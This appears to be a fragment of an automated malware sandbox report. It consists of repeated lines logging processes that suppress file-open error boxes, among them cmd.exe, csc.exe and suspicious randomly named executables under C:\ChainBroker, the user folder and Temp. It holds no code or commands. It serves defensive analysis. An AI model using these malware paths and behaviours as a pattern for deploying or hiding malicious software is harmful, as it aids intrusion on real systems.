                                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information set: NOOPENFILEERRORBOX
